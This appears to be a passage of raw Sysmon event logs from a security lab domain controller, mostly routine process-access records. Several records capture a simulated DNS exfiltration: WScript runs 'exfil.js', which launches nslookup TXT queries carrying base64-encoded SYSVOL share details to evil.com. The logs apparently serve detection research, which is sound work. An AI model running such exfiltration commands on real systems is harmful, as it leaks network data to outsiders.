14:16:27.354{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.354{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.354{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.354{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.354{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F83F-000000005F02}6156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.354{2E1864BB-17BB-629A-F63F-000000005F02}3362788C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-F83F-000000005F02}6156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.368{2E1864BB-17BB-629A-F83F-000000005F02}6156C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-F63F-000000005F02}336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpbac.tmp 2>&1 10341000x8000000000000000199176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.338{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F73F-000000005F02}8060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.338{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F73F-000000005F02}8060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.338{2E1864BB-17BB-629A-F73F-000000005F02}80605480C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F63F-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.323{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F73F-000000005F02}8060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.307{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F63F-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.307{2E1864BB-17A1-629A-783D-000000005F02}55525516C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-F63F-000000005F02}336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.322{2E1864BB-17BB-629A-F63F-000000005F02}336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpbac.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.307{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsjo.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-17BB-629A-F43F-000000005F02}27645772C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F53F-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F53F-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.285{2E1864BB-17BB-629A-F33F-000000005F02}75845884C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-F53F-000000005F02}7220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.292{2E1864BB-17BB-629A-F53F-000000005F02}7220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-F33F-000000005F02}7584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsjo.tmp 2>&1 10341000x8000000000000000199156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.269{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F43F-000000005F02}2764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.269{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-F43F-000000005F02}2764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.269{2E1864BB-17BB-629A-F43F-000000005F02}27645772C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F33F-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F43F-000000005F02}2764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.253{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F33F-000000005F02}7584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 